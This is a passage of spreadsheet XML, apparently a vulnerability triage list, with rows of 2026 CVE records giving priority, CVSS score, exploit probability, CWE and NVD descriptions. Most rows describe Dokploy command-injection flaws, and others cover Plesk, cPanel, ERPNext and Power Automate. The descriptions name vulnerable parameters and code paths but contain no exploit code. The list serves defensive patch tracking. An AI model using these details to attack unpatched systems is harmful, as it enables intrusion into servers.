      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G66" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H66" s="5" t="inlineStr">
        <is>
          <t>microsoft:power_platform</t>
        </is>
      </c>
      <c r="I66" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Power Automate allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65818</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65974</t>
        </is>
      </c>
      <c r="C67" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.111.0 and 16.22.0, limited authenticated users can cross a permission boundary in Frappe safe execution because frappe.render_template is exposed without forcing restrict_globals, allowing server-side template injection and remote code execution. This issue is fixed in versions 15.111.0 and 16.22.0.</t>
        </is>
      </c>
      <c r="M67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65974</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66795</t>
        </is>
      </c>
      <c r="C68" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the managedcluster-import-controller. The Certificate Signing Request (CSR) auto-approval logic improperly validates incoming CSRs, specifically by not inspecting the signer name or decoding the PEM-encoded x509 CSR. This vulnerability allows a privileged service account on a spoke cluster to submit a malicious CSR. Successful exploitation can lead to privilege escalation, enabling the attacker to obtain administrative credentials on the hub cluster.</t>
        </is>
      </c>
      <c r="M68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66795</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67401</t>
        </is>
      </c>
      <c r="C69" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in cPanel allows a mail-enabled account to achieve remote code execution as root through SQLi in EmailTrack component</t>
        </is>
      </c>
      <c r="M69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67401</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68487</t>
        </is>
      </c>
      <c r="C70" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="inlineStr"/>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>Path traversal in Plesk's Backup Manager causes arbitrary file write as root by an authenticated customer.</t>
        </is>
      </c>
      <c r="M70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68487</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68488</t>
        </is>
      </c>
      <c r="C71" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="inlineStr"/>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>A Time-of-check Time-of-use (TOCTOU) race condition leading to insecure symlink following in Plesk causes local privilege escalation to root via arbitrary file/directory ownership takeover.</t>
        </is>
      </c>
      <c r="M71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68488</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72733</t>
        </is>
      </c>
      <c r="C72" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the backup.restoreBackupWithLogs tRPC subscription builds database restore shell pipelines from the user-controlled databaseName and backupFile fields without safely separating them from shell syntax. packages/server/src/utils/restore/utils.ts interpolates databaseName into database-specific restore commands, while packages/server/src/utils/restore/postgres.ts and the analogous restore modules interpolate backupFile into rclone paths. An authenticated member with backup-restore permission can inject operating-system commands that execute in the Dokploy host context through execAsync or execAsyncRemote, even when no valid database container or backup file exists. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72733</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72735</t>
        </is>
      </c>
      <c r="C73" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E73" s="5" t="inlineStr"/>
      <c r="F73" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, writeTraefikConfigRemote in packages/server/src/utils/traefik/application.ts serializes user-controlled Traefik configuration with yaml.stringify and interpolates the resulting yamlStr into an echo command executed through execAsyncRemote. Single quotes in redirect regex and replacement fields, basic authentication usernames, domain host values, or middleware configuration can terminate the shell quoting and execute arbitrary commands on managed remote servers with the configured SSH user's privileges. This vulnerability is caused by an incomplete fix for CVE-2026-45630. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72735</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72736</t>
        </is>
      </c>
      <c r="C74" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E74" s="5" t="inlineStr"/>
      <c r="F74" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G74" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy passes user-controlled values directly into shell commands via unquoted template literal interpolation in the registry credential testing and Docker Swarm cluster management endbpoints. Both endpoints have a safe local code path (using execFileAsync or the Docker API) but a vulnerable remote path (using execAsyncRemote which runs the shell string via SSH). This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72736</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72738</t>
        </is>
      </c>
      <c r="C75" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E75" s="5" t="inlineStr"/>
      <c r="F75" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L75" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the backup.listBackupFiles tRPC endpoint in apps/dokploy/server/api/routers/backup.ts passes the search parameter through normalizeS3Path and interpolates it into an rclone lsjson command executed by child_process.exec(), allowing an authenticated user with backup:read permission to execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72738</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72740</t>
        </is>
      </c>
      <c r="C76" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E76" s="5" t="inlineStr"/>
      <c r="F76" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, packages/server/src/utils/providers/git.ts parses the user-controlled customGitUrl with sanitizeRepoPathSSH and interpolates its domain into the ssh-keyscan command from addHostToKnownHostsCommand without shell quoting, allowing an authenticated member with service deployment permission and an attached SSH key to execute arbitrary commands on the Dokploy host during deployment. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72740</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72862</t>
        </is>
      </c>
      <c r="C77" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G77" s="5" t="inlineStr">
        <is>
          <t>docker, mysql, redis</t>
        </is>
      </c>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the mariadb.ts, mongo.ts, mysql.ts, postgres.ts, redis.ts, and libsql.ts Dokploy database service deployment functions pass user-controlled dockerImage fields unquoted into docker pull ${dockerImage} shell commands on the remote-server code path. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72862</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72863</t>
        </is>
      </c>
      <c r="C78" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E78" s="5" t="inlineStr"/>
      <c r="F78" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G78" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy's WebSocket handlers (in-app terminals and log streamers) authenticate the session but never authorize it. They establish who the user is via validateRequest() and then proceed without consulting the role/permission model that every tRPC procedure enforces. Any authenticated member, can therefore open an interactive shell into any container on the host, including the dokploy container that mounts the Docker socket, and from there obtain root on the host, escaping the application and crossing every tenant boundary. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72863</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72864</t>
        </is>
      </c>
      <c r="C79" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E79" s="5" t="inlineStr"/>
      <c r="F79" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G79" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the local branch of /docker-container-terminal in apps/dokploy/server/wss/docker-container-terminal.ts authenticates with validateRequest but does not authorize the attacker-controlled containerId against the caller's role, organization, or service access before passing it to `docker exec`, allowing any authenticated member to obtain a root shell in arbitrary containers on a self-hosted instance. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72864</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72865</t>
        </is>
      </c>
      <c r="C80" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G80" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the compose.update operation stores an unvalidated composePath that packages/server/src/utils/builders/compose.ts and packages/server/src/services/compose.ts interpolate into docker compose -f, docker stack deploy -c, and touch shell commands executed through /bin/sh -c. An authenticated member with compose write and deploy permission can supply a crafted composePath, trigger compose.deploy or startCompose, and execute arbitrary operating-system commands in the Docker-privileged Dokploy host context. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72865</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72867</t>
        </is>
      </c>
      <c r="C81" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E81" s="5" t="inlineStr"/>
      <c r="F81" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G81" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-602, CWE-78</t>
        </is>
      </c>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.29.3 until 0.29.13, the incomplete fix for CVE-2026-45628 leaves packages/server/src/db/schema/compose.ts branch fields without server-side validation, allowing a direct compose.update request to store a malicious customGitBranch, branch, gitlabBranch, bitbucketBranch, or giteaBranch. A low-privileged authenticated user can trigger compose.deploy, which passes the stored branch to shell-based Git clone commands in packages/server/src/utils/providers/git.ts, github.ts, gitlab.ts, bitbucket.ts, and gitea.ts, resulting in arbitrary host command execution. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72867</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72868</t>
        </is>
      </c>
      <c r="C82" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E82" s="5" t="inlineStr"/>
      <c r="F82" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G82" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, apps/dokploy/server/api/routers/destination.ts interpolates the accessKey, secretAccessKey, region, endpoint, provider, and bucket fields from destination.testConnection into an rclone ls command executed through child_process.exec. The `withPermission("destination", "create")` path permits a low-privileged organization member to reach the mutation, close a quoted argument with a crafted field, and execute arbitrary commands in the root Dokploy container, which has access to the host Docker socket. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72868</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72869</t>
        </is>
      </c>
      <c r="C83" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E83" s="5" t="inlineStr"/>
      <c r="F83" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G83" s="5" t="inlineStr">
        <is>
          <t>docker, node.js, postgresql, mysql, mongodb</t>
        </is>
      </c>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the backup.restoreBackupWithLogs tRPC subscription passes the databaseName parameter to restore builders in packages/server/src/utils/restore/utils.ts, where PostgreSQL, MariaDB, MySQL, and MongoDB commands embed the value in nested shell text executed by Node.js exec. An authenticated user with backup:restore permission can supply a crafted databaseName that the host /bin/sh expands before docker exec, resulting in arbitrary commands running in the Docker-privileged host context. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72869</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72872</t>
        </is>
      </c>
      <c r="C84" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E84" s="5" t="inlineStr"/>
      <c r="F84" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, application.saveBitbucketProvider stores bitbucketOwner and bitbucketRepository without validation and cloneBitbucketRepository in packages/server/src/utils/providers/bitbucket.ts interpolates those values into git clone commands executed through execAsync or execAsyncRemote, allowing a member with service deployment permission to execute arbitrary operating system commands on the Dokploy host or target server. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72872</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72876</t>
        </is>
      </c>
      <c r="C85" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E85" s="5" t="inlineStr"/>
      <c r="F85" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G85" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, swarm.getNodes, swarm.getNodeInfo, swarm.getNodeApps, and swarm.getAppInfos in apps/dokploy/server/api/routers/swarm.ts accept another organization’s serverId without an activeOrganizationId ownership check, and getNodeInfo in packages/server/src/services/docker.ts interpolates nodeId into execAsyncRemote, allowing a caller with server:read permission to execute arbitrary commands as the configured SSH user on another tenant’s server. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72876</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72880</t>
        </is>
      </c>
      <c r="C86" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E86" s="5" t="inlineStr"/>
      <c r="F86" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the apiCreateCertificate schema in packages/server/src/db/schema/certificate.ts accepts a client-supplied certificatePath, and packages/server/src/services/certificate.ts joins that value to the certificate root without confinement. An authenticated user with certificate create or delete permission can use certificatePath to write attacker-controlled certificate content outside the intended directory or delete an out-of-root directory. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72880</t>
